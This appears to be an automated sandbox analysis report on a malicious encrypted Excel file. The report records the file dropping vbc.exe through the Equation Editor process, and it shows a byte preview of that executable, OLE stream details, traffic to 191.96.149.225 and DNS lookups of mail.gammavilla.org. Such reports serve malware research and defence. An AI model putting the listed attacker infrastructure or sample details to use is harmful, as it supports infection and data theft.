Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\Desktop\~$0AX4532QWSA.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	812032
Entropy (8bit):	7.920094533275065
Encrypted:	false
SSDEEP:	12288:yvNFVgCBX3xTqRv2RVozqB6Gnw3OvLS19TTPshs+nEQqkmyaIIQFq:MFVR352+DQSRW193sTnEdPy3
MD5:	72B76DB11728DD92AA4C3CB45F155B05
SHA1:	743E9F3600FD98E8F73F0E61DF6EDB1571BD4523
SHA-256:	469EF5404A9F75003F9A50A94BFBBBC339F1F649275FEE87C102F72D4F97443E
SHA-512:	705A3ED3401AF991B0548164B2C5D66A28B86CE57F11685C71A6B47935EC79DB53056E9EDFC8E3458CC7B6168D8452B4AFC918E5AF8051942DC5068F08E9A7C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..Z...........y... ........@.. ....................................@.................................<y..O................................... y............................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................py......H...........\.......K...@K...-...........................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....".(.......0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995653517983219
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	0AX4532QWSA.xlsx
File size:	1385984
MD5:	9b4eeaed62b4b0253a7a3205f771099d
SHA1:	e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256:	9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
SHA512:	14f539709d5a6a0312bae5a236326812b5bbf9af34b555764c937a3095bd14e689c04f5d95e94b2a118eca42173295cec92779f6688a6e4e8d6b4a49e0deff0e
SSDEEP:	24576:GrwrM4dAXCdbZPU5nubYizvfUnlNgRZ0ad9OC1jnvOarfUBapjOaIO:ywo4CU85nubYiznUlNgv0nC1jPcBQjIO
File Content Preview:	........................>...............................................................................................z.......\|.......~...............z.......\|..............................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "0AX4532QWSA.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1370920

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1370920
Entropy:	7.99986275596
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . U e 1 _ . . . . Y . X . P a . . . . V . . H . . . K t p . . . . . . . . * . . . g P . . . . . . ] H A C . . . 3 7 " . . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . *
Data Raw:	1a eb 14 00 00 00 00 00 d5 9a ff 55 65 31 5f d1 86 0d 1d 59 b6 58 db 50 61 b3 db e4 90 56 13 92 48 ad a7 b1 4b 74 70 80 da fd d0 f4 1f d7 a4 2a a0 8b a3 67 50 c8 9c c0 04 f4 0f 5d 48 41 43 d3 d3 bf 33 37 22 c2 f5 e0 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.58057080349
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . m . . . . H . Z E T : . . . . < . . . . . 2 3 . . ~ $ D . . . . . . . . j P . . U 9 . . . . . 2 . u . . . . 8 . . . . 2 . . . !
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:42:44.748771906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:44.914962053 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:44.915137053 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:44.916251898 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084038019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084103107 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084141016 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084191084 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084212065 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084249973 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084259987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084270000 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084291935 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084295034 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084332943 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084373951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084403992 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084434032 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084542990 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084578991 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.093185902 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250488997 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250545025 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250574112 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250605106 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250633001 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250669956 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250705957 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250751019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250793934 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250830889 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250847101 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250868082 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250893116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250899076 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250902891 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250906944 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250907898 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250912905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250945091 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250971079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250983000 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251005888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251020908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251041889 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251068115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251069069 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251112938 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251128912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251149893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251171112 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251189947 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251204967 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251228094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251249075 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251270056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.253437042 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417339087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417431116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417471886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417495966 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417512894 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417532921 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417538881 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417562962 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417577982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417609930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417634964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417649031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417687893 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417696953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417728901 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417738914 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417756081 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417778015 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417795897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417820930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417829037 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417860031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417872906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417898893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417912006 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417937040 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417974949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417984962 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417996883 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418020964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418024063 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418067932 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418082952 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418106079 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418121099 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418147087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418160915 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418185949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418200970 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418221951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418237925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418262005 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418277979 CET	49167	80	192.168.2.22	191.96.149.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:43:34.206883907 CET	52197	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:34.365825891 CET	53	52197	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:34.406476974 CET	53099	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:34.561983109 CET	53	53099	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:35.734723091 CET	52838	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:35.794058084 CET	53	52838	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:35.807879925 CET	61200	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:35.855926037 CET	53	61200	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.447720051 CET	49548	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.496004105 CET	53	49548	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.510776043 CET	55627	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.572196960 CET	53	55627	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.573141098 CET	55627	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.630517960 CET	53	55627	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.376554966 CET	56009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.436955929 CET	53	56009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.437974930 CET	56009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.515703917 CET	53	56009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.549091101 CET	61865	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.610347986 CET	53	61865	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.547009945 CET	55171	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.606236935 CET	53	55171	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.606689930 CET	55171	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.665968895 CET	53	55171	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.703999043 CET	52496	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.759926081 CET	53	52496	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.760759115 CET	52496	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.808614016 CET	53	52496	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.778553009 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.835068941 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.836003065 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.892323017 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.893451929 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.949981928 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.951000929 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:11.009556055 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:11.056170940 CET	63009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:11.112289906 CET	53	63009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:22.020467043 CET	59319	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:22.087548018 CET	53	59319	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:22.126532078 CET	53070	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:22.174501896 CET	53	53070	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 20:43:34.206883907 CET	192.168.2.22	8.8.8.8	0xfd76	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:34.406476974 CET	192.168.2.22	8.8.8.8	0xd5e3	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.376554966 CET	192.168.2.22	8.8.8.8	0x8b56	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.437974930 CET	192.168.2.22	8.8.8.8	0x8b56	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.549091101 CET	192.168.2.22	8.8.8.8	0xe6d3	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.547009945 CET	192.168.2.22	8.8.8.8	0x5d3c	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.606689930 CET	192.168.2.22	8.8.8.8	0x5d3c	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.703999043 CET	192.168.2.22	8.8.8.8	0x8c6f	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.760759115 CET	192.168.2.22	8.8.8.8	0x8c6f	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.778553009 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.836003065 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.893451929 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.951000929 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.056170940 CET	192.168.2.22	8.8.8.8	0x7350	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.020467043 CET	192.168.2.22	8.8.8.8	0x1780	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.126532078 CET	192.168.2.22	8.8.8.8	0xf21b	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 20:43:34.365825891 CET	8.8.8.8	192.168.2.22	0xfd76	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:34.365825891 CET	8.8.8.8	192.168.2.22	0xfd76	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:34.561983109 CET	8.8.8.8	192.168.2.22	0xd5e3	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:34.561983109 CET	8.8.8.8	192.168.2.22	0xd5e3	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.436955929 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.436955929 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.515703917 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.515703917 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.610347986 CET	8.8.8.8	192.168.2.22	0xe6d3	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.610347986 CET	8.8.8.8	192.168.2.22	0xe6d3	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.606236935 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.606236935 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.665968895 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.665968895 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.759926081 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.759926081 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.808614016 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
